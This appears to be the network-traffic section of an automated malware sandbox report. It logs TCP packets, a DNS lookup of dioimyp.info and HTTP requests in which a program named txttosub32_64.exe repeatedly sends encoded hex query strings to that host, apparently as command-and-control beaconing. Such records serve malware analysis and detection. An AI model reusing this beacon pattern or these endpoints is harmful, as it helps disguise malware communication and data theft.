                                                                                Oct 8, 2024 22:39:49.786228895 CEST8050047185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:50.519362926 CEST8050047185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:50.519433022 CEST5004780192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:50.682009935 CEST5004780192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:50.682243109 CEST5004880192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:50.785526037 CEST8050047185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:50.785756111 CEST5004780192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:50.786214113 CEST8050048185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:50.786268950 CEST8050047185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:50.786307096 CEST5004880192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:50.786329031 CEST5004780192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:50.786504984 CEST5004880192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:50.791552067 CEST8050048185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:51.482151031 CEST8050048185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:51.482245922 CEST5004880192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:51.588520050 CEST5004880192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:51.593524933 CEST8050048185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:51.832746983 CEST8050048185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:51.832825899 CEST5004880192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:51.947772026 CEST5004880192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:51.948050022 CEST5004980192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:51.953099012 CEST8050049185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:51.953154087 CEST8050048185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:51.953279972 CEST5004880192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:51.953299046 CEST5004980192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:51.953459024 CEST5004980192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:51.958412886 CEST8050049185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:52.693994999 CEST8050049185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:52.694103003 CEST5004980192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:52.807203054 CEST5004980192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:52.807353973 CEST5005080192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:52.817142963 CEST8050050185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:52.817231894 CEST5005080192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:52.817420959 CEST5005080192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:52.821266890 CEST8050049185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:52.821329117 CEST5004980192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:52.822217941 CEST8050050185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:53.585365057 CEST8050050185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:53.585525036 CEST5005080192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:53.698781967 CEST5005080192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:53.699246883 CEST5005180192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:53.704344034 CEST8050051185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:53.704427958 CEST5005180192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:53.704535007 CEST8050050185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:53.704602957 CEST5005080192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:53.704628944 CEST5005180192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:53.709542036 CEST8050051185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:54.625350952 CEST8050051185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:54.625557899 CEST5005180192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:54.626771927 CEST8050051185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:54.626853943 CEST5005180192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:54.744812965 CEST5005180192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:54.745157003 CEST5005280192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:54.750185013 CEST8050052185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:54.750308990 CEST5005280192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:54.750433922 CEST5005280192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:54.750693083 CEST8050051185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:54.750770092 CEST5005180192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:54.755575895 CEST8050052185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:55.488585949 CEST8050052185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:55.488668919 CEST5005280192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:55.605460882 CEST5005280192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:55.606010914 CEST5005380192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:55.610874891 CEST8050052185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:55.611043930 CEST8050053185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:55.611107111 CEST5005280192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:55.611308098 CEST5005380192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:55.611354113 CEST5005380192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:55.616609097 CEST8050053185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:56.321888924 CEST8050053185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:56.322202921 CEST5005380192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:56.432460070 CEST5005380192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:56.432739019 CEST5005480192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:56.437665939 CEST8050054185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:56.437784910 CEST5005480192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:56.438071012 CEST5005480192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:56.438952923 CEST8050053185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:56.439014912 CEST5005380192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:56.443017006 CEST8050054185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:57.149111986 CEST8050054185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:57.149353981 CEST5005480192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:57.260689974 CEST5005480192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:57.261046886 CEST5005580192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:57.266119957 CEST8050055185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:57.266199112 CEST8050054185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:57.266325951 CEST5005480192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:57.266333103 CEST5005580192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:57.266503096 CEST5005580192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:57.271332979 CEST8050055185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:57.996447086 CEST8050055185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:57.996547937 CEST5005580192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:58.104140997 CEST5005580192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:58.109133005 CEST8050055185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:58.360666037 CEST8050055185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:58.360930920 CEST5005580192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:58.497827053 CEST5005580192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:58.498159885 CEST5005680192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:58.503401995 CEST8050056185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:58.503494024 CEST5005680192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:58.503521919 CEST8050055185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:58.503586054 CEST5005580192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:58.503674984 CEST5005680192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:58.508625031 CEST8050056185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:59.200555086 CEST8050056185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:59.200618982 CEST5005680192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:59.334804058 CEST5005680192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:59.338769913 CEST5005780192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:59.340270042 CEST8050056185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:59.340336084 CEST5005680192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:59.343732119 CEST8050057185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:39:59.343830109 CEST5005780192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:59.352638006 CEST5005780192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:39:59.357589006 CEST8050057185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:00.064316988 CEST8050057185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:00.064420938 CEST5005780192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:00.182651043 CEST5005780192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:00.182871103 CEST5005880192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:00.187705040 CEST8050058185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:00.187824011 CEST5005880192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:00.187935114 CEST8050057185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:00.188101053 CEST5005780192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:00.188102007 CEST5005880192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:00.193454981 CEST8050058185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:00.899380922 CEST8050058185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:00.899470091 CEST5005880192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:01.011071920 CEST5005880192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:01.011230946 CEST5005980192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:01.016055107 CEST8050059185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:01.016144991 CEST5005980192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:01.016216993 CEST5005980192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:01.021055937 CEST8050059185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:01.041661978 CEST8050058185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:01.041862965 CEST5005880192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:01.739475965 CEST8050059185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:01.739536047 CEST5005980192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:01.858792067 CEST5005980192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:01.859252930 CEST5006080192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:01.864289045 CEST8050060185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:01.864418030 CEST5006080192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:01.864572048 CEST5006080192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:01.865034103 CEST8050059185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:01.865106106 CEST5005980192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:01.869569063 CEST8050060185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:02.568541050 CEST8050060185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:02.568845034 CEST5006080192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:02.683556080 CEST5006080192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:02.683840036 CEST5006180192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:02.688817024 CEST8050061185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:02.688932896 CEST5006180192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:02.688977003 CEST8050060185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:02.689121962 CEST5006180192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:02.689132929 CEST5006080192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:02.693960905 CEST8050061185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:03.401740074 CEST8050061185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:03.401974916 CEST5006180192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:03.511641979 CEST5006180192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:03.512026072 CEST5006280192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:03.517833948 CEST8050062185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:03.518026114 CEST5006280192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:03.518201113 CEST5006280192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:03.518349886 CEST8050061185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:03.518429041 CEST5006180192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:03.524396896 CEST8050062185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:04.218090057 CEST8050062185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:04.218173027 CEST5006280192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:04.346152067 CEST5006280192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:04.346750975 CEST5006380192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:04.351999044 CEST8050062185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:04.352046013 CEST8050063185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:04.352087975 CEST5006280192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:04.352267981 CEST5006380192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:04.353097916 CEST5006380192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:04.358325958 CEST8050063185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:05.063070059 CEST8050063185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:05.063484907 CEST5006380192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:05.185808897 CEST5006380192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:05.186047077 CEST5006480192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:05.190960884 CEST8050064185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:05.191137075 CEST8050063185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:05.191236973 CEST5006380192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:05.191476107 CEST5006480192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:05.191476107 CEST5006480192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:05.196696043 CEST8050064185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:05.937021017 CEST8050064185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:05.937241077 CEST5006480192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:06.063999891 CEST5006480192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:06.064318895 CEST5006580192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:06.069382906 CEST8050065185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:06.069565058 CEST5006580192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:06.069833040 CEST5006580192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:06.071809053 CEST8050064185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:06.072035074 CEST5006480192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:06.075361013 CEST8050065185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:06.788832903 CEST8050065185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:06.788944960 CEST5006580192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:06.904409885 CEST5006580192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:06.904886007 CEST5006680192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:06.909864902 CEST8050066185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:06.910096884 CEST5006680192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:06.910096884 CEST5006680192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:06.910260916 CEST8050065185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:06.910326958 CEST5006580192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:06.915100098 CEST8050066185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:07.620527983 CEST8050066185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:07.621401072 CEST5006680192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:07.749191999 CEST5006680192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:07.749223948 CEST5006780192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:07.754291058 CEST8050067185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:07.754739046 CEST8050066185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:07.754885912 CEST5006780192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:07.754992962 CEST5006680192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:07.755089998 CEST5006780192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:07.760000944 CEST8050067185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:08.492700100 CEST8050067185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:08.492899895 CEST5006780192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:08.639288902 CEST5006780192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:08.640254974 CEST5006880192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:08.645265102 CEST8050067185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:08.645483971 CEST5006780192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:08.645819902 CEST8050068185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:08.645972013 CEST5006880192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:08.646107912 CEST5006880192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:08.651973009 CEST8050068185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:09.353689909 CEST8050068185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:09.353795052 CEST5006880192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:09.516025066 CEST5006880192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:09.516421080 CEST5006980192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:09.521440983 CEST8050069185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:09.521547079 CEST5006980192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:09.521596909 CEST8050068185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:09.521784067 CEST5006880192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:09.522080898 CEST5006980192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:09.526899099 CEST8050069185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:10.234512091 CEST8050069185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:10.234591007 CEST5006980192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:10.359689951 CEST5006980192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:10.360052109 CEST5007080192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:10.365143061 CEST8050069185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:10.365201950 CEST5006980192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:10.365485907 CEST8050070185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:10.365547895 CEST5007080192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:10.365833998 CEST5007080192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:10.371148109 CEST8050070185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:11.752454996 CEST8050070185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:11.752602100 CEST5007080192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:11.752856016 CEST8050070185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:11.753056049 CEST5007080192.168.2.4185.208.158.248
                                                                                Oct 8, 2024 22:40:11.753379107 CEST8050070185.208.158.248192.168.2.4
                                                                                Oct 8, 2024 22:40:11.753756046 CEST5007080192.168.2.4185.208.158.248
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Oct 8, 2024 22:39:00.454224110 CEST5761153192.168.2.445.155.250.90
                                                                                Oct 8, 2024 22:39:00.488118887 CEST535761145.155.250.90192.168.2.4
                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Oct 8, 2024 22:39:00.454224110 CEST192.168.2.445.155.250.900x4795Standard query (0)dioimyp.infoA (IP address)IN (0x0001)false
                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Oct 8, 2024 22:39:00.488118887 CEST45.155.250.90192.168.2.40x4795No error (0)dioimyp.info185.208.158.248A (IP address)IN (0x0001)false
                                                                                • dioimyp.info
                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                0192.168.2.449753185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:00.667632103 CEST319OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c446db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608cf715c1e69c9e3c HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:01.392460108 CEST888INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:01 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 32 61 38 0d 0a 36 37 62 36 38 61 38 61 33 32 30 33 61 37 37 62 30 34 31 38 66 35 35 66 36 37 37 63 38 31 63 34 35 39 66 65 38 62 64 32 65 39 31 66 31 65 66 35 61 32 35 63 65 39 31 35 38 35 62 63 63 66 62 35 66 62 63 34 30 61 64 39 30 38 38 62 65 38 64 65 32 32 36 36 65 32 30 38 61 36 62 62 39 64 35 39 32 64 65 30 37 35 34 36 61 62 37 36 65 38 36 36 61 38 33 32 34 62 63 31 66 62 64 30 30 32 63 31 34 33 63 64 37 64 62 62 31 33 66 65 32 64 38 62 32 35 65 35 30 65 61 34 36 36 63 30 34 64 62 61 65 62 34 36 65 37 35 38 37 66 34 33 65 63 32 66 36 36 39 31 33 64 37 39 38 62 66 36 30 66 63 32 65 63 39 36 38 34 33 61 63 64 36 63 39 63 31 37 64 38 35 30 38 66 32 31 62 32 35 63 61 64 65 65 35 39 33 66 65 62 37 63 63 63 66 66 37 61 62 31 38 35 65 63 64 35 34 61 65 36 33 35 63 62 31 31 32 62 35 62 35 65 33 65 65 32 32 37 37 37 31 36 36 31 62 30 65 36 38 63 66 65 38 36 32 64 35 61 65 65 35 65 36 35 32 33 66 65 32 38 34 33 66 36 66 61 65 36 39 32 66 62 33 61 37 65 61 65 65 38 34 37 39 32 38 34 66 30 37 62 32 30 31 [TRUNCATED]
                                                                                Data Ascii: 2a867b68a8a3203a77b0418f55f677c81c459fe8bd2e91f1ef5a25ce91585bccfb5fbc40ad9088be8de2266e208a6bb9d592de07546ab76e866a8324bc1fbd002c143cd7dbb13fe2d8b25e50ea466c04dbaeb46e7587f43ec2f66913d798bf60fc2ec96843acd6c9c17d8508f21b25cadee593feb7cccff7ab185ecd54ae635cb112b5b5e3ee227771661b0e68cfe862d5aee5e6523fe2843f6fae692fb3a7eaee8479284f07b201ba36aef86cfb27bd06b0d223464ac5ccfd8a9272fbcd70fbc09a7a03ab2c1cb3074210fda32f512eed8a0064adb2112cc51d1f7639d2dbc9757a0fcd1a8c92522bb71a3ef099aaab8735aa08cfd25b3ff808e01ef10e444814b64c5b0c1fdd34966bf9bef3eb1758c0829a920d232de9f00cb56b439010250ced6705a384c6c8fff8e2a2c761e558b9ade4c4caa8fe6e4cb653a3fbf50c59346484d8bf8985c1f1fd97f70513748e6dadbc5f5fa0
                                                                                Oct 8, 2024 22:39:04.112380028 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                Oct 8, 2024 22:39:04.845149994 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:04 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:39:04.845755100 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:04 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20
                                                                                Oct 8, 2024 22:39:04.846187115 CEST220INHTTP/1.1 200 OK
                                                                                Server: nginx/1.20.1
                                                                                Date: Tue, 08 Oct 2024 20:39:04 GMT
                                                                                Content-Type: text/html; charset=UTF-8
                                                                                Transfer-Encoding: chunked
                                                                                Connection: keep-alive
                                                                                X-Powered-By: PHP/7.4.33
                                                                                Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                Data Ascii: e67b680813008c20


                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                1192.168.2.449780185.208.158.248807584C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe
                                                                                TimestampBytes transferredDirectionData
                                                                                Oct 8, 2024 22:39:05.173103094 CEST327OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86ee94814a885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b415e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ed9d9e3ac4669211 HTTP/1.1
                                                                                Host: dioimyp.info
                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
